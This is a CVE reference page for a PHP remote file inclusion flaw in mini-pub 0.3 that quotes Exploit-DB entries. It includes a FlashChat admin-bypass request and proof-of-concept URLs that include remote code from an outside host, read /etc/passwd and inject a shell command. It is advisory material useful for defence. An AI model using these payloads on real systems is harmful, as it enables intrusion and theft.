CVE-2008-5581
published 2008-12-15CVE-2008-5581: PHP remote file inclusion vulnerability in mini-pub.php/front-end/img.php in mini-pub 0.3 allows remote attackers to execute arbitrary PHP code via a URL in…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.48%
82.6th percentile
PHP remote file inclusion vulnerability in mini-pub.php/front-end/img.php in mini-pub 0.3 allows remote attackers to execute arbitrary PHP code via a URL in the sFileName parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mini-pub | mini-pub | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
FlashChat - 'connection.php' Role Filter Security Bypass
exploitdb·2008-10-17
CVE-2008-6799 FlashChat - 'connection.php' Role Filter Security Bypass
FlashChat - 'connection.php' Role Filter Security Bypass
---
source: https://www.securityfocus.com/bid/31800/info
FlashChat is prone to a security-bypass vulnerability.
An attacker can leverage this vulnerability to bypass certain security restrictions and gain unauthorized administrative access to the affected application.
sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=
Exploit-DB
mini-pub 0.3 - File Disclosure / Code Execution
exploitdb·2008-10-12
CVE-2008-5581 mini-pub 0.3 - File Disclosure / Code Execution
mini-pub 0.3 - File Disclosure / Code Execution
---
mini-pub 0.3 multiple vulnerabilities
download http://sourceforge.net/projects/mini-pub/
author muuratsalo
contact muuratsalo[at]gmail.com
exploits
1. local file disclosure
http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.com/cmd.txt?
2. local file disclosure
http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd
3. command execution
http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv
# milw0rm.com [2008-10-12]
No writeups or analysis indexed.
http://securityreason.com/securityalert/4733http://www.securityfocus.com/archive/1/487695/100/200/threadedhttp://www.securityfocus.com/bid/27671https://www.exploit-db.com/exploits/6733http://securityreason.com/securityalert/4733http://www.securityfocus.com/archive/1/487695/100/200/threadedhttp://www.securityfocus.com/bid/27671https://www.exploit-db.com/exploits/6733
2008-12-15
Published